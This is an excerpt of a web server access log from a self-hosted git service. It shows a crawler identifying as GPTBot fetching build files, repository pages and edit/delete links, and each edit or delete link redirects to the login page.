"/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13363] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13335] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20366] [Gzip 9.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15208] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14041] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:18:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11777] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:14:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:14:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10110] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 1492] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16923] [Gzip 8.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 1492] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 2028] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14573] [Gzip 8.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10325] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10111] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23757] [Gzip 18.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:15:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:18:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 